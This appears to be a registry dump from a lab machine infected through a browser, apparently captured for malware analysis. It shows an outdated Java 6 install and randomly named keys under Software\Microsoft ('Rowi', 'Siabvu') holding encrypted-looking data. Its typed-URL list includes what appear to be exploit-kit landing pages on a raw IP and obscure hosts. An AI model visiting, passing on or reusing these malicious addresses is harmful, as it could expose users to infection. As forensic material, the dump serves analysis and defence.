HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 StoreMigratedV5 dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 ConvertedToDBX dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Settings Upgraded dword:00000007
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Running dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Store Root hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpoolerDlgPos hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpoolerTack dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Compact Check Count dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Welcome Message dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Accounts Checked hex:00,00,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Safe Attachments dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Secure Safe Attachments dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Default_CodePage dword:00006faf
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News Accounts Checked hex:00,00,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29 BalloonShown dword:00000001
HKEY_CURRENT_USER\Software\JavaSoft\Java Update
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy LastUpdateBeginTime "Sat, 22 Sep 2012 16:30:08 GMT"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy LastUpdateFinishTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy VersionXmlURL "http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX UpdateSchedule dword:00000011
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX UpdateScheduleMinutes dword:0000001a
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX Frequency dword:00000020
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX LastUpdateInvokedTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication Name "java.exe"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager Server ID dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager Default LDAP Account "Active Directory GC"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts PreConfigVer dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts PreConfigVerNTDS dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts ConnectionSettingsMigrated dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts AssociatedID hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server ID dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC Account Name "Active Directory"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Authentication dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Simple Search dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Bind DN dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Port dword:00000cc4
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Resolve Flag dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Secure Connection dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP User Name "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Base "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server ID dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot Account Name "Bigfoot Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server "ldap.bigfoot.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP URL "http://www.bigfoot.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Authentication dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Simple Search dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server ID dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign Account Name "VeriSign Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server "directory.verisign.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP URL "http://www.verisign.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Authentication dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Base "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Simple Search dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server ID dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere Account Name "WhoWhere Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server "ldap.whowhere.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP URL "http://www.whowhere.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Authentication dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Simple Search dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Rowi
HKEY_CURRENT_USER\Software\Microsoft\Rowi Xoywarsu hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,
HKEY_CURRENT_USER\Software\Microsoft\Siabvu
HKEY_CURRENT_USER\Software\Microsoft\WAB
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4 OlkContactRefresh dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4 OlkFolderRefresh dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4 FirstRun dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name @ "C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FriendlyName "Default MidiOut Device"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device CLSID "{07B65360-C445-11CE-AFDE-00AA006C14F4}"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device MidiOutId dword:ffffffff
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FriendlyName "Default DirectSound Device"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device CLSID "{79376820-07D0-11CF-A24D-0020AFD79767}"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device DSGuid "{00000000-0000-0000-0000-000000000000}"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy CleanCookies dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowClosedTabs dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowActivities dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar CompatibilityViewButtonBalloonCount dword:00000001 dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active {8CFA7582-04D2-11E2-A16C-08002765500A} dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active {E4F1361D-04D0-11E2-A16B-08002765500A} dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url1 "http://www.google.com/" "http://46.249.59.116/main.php?page=5a56c997ffff2f79"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url2 "http://google.com/" "http://www.google.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url3 "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775" "http://ns8.ns360.info/main.php?page=f61d19dee2176c62"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url4 "http://urlquery.net/" "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url5 "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC" "http://urlquery.net/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url6 "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html" "http://google.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url7 "http://oldversion.com/" "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url8 "http://go.microsoft.com/fwlink/?LinkId=69157" "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url9 "http://oldversion.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url10 "http://go.microsoft.com/fwlink/?LinkId=69157"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332} AttemptedAutoRun dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4} AttemptedAutoRun dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz Prefs "mute;False"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying InitFlags dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowHorizontalSeparator dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowVerticalSeparator dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistWidth dword:000000ba
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistHeight dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsWidth dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsHeight dword:00000087
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataWidth dword:000000ba
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataHeight dword:000000a0
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying CaptionsHeight dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings Client ID "{43209BE6-BD53-40A7-9DD3-50364635A3E4}"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences AcceptedPrivacyStatement dword:00000000 dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences MetadataRetrieval dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences SendUserGUID hex:00,
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences SilentAcquisition dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UsageTracking dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences DisableMRU dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LaunchIndex dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences AppColorLimited dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences FirstRun dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences X "10"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Y "10"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Width "686"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Height "536"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Maximized "0"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Volume dword:00000032
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ModeShuffle dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ModeLoop dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Mute dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Balance dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentEffectType "Battery"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentEffectPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences VideoZoom dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShrinkToFit dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowEffects dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowFullScreenPlaylist dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingQuickHide dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowTitles dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowCaptions dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingPlaylist dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingMetadata dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingSettings dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences VizAutoSelect dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayView "VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsView "EQView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataView "MediaInfoView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserDisplayView "VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayView "VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsView "EQView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataView "MediaInfoView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserDisplayPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPShowSettings dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPShowMetadata dword:00000000
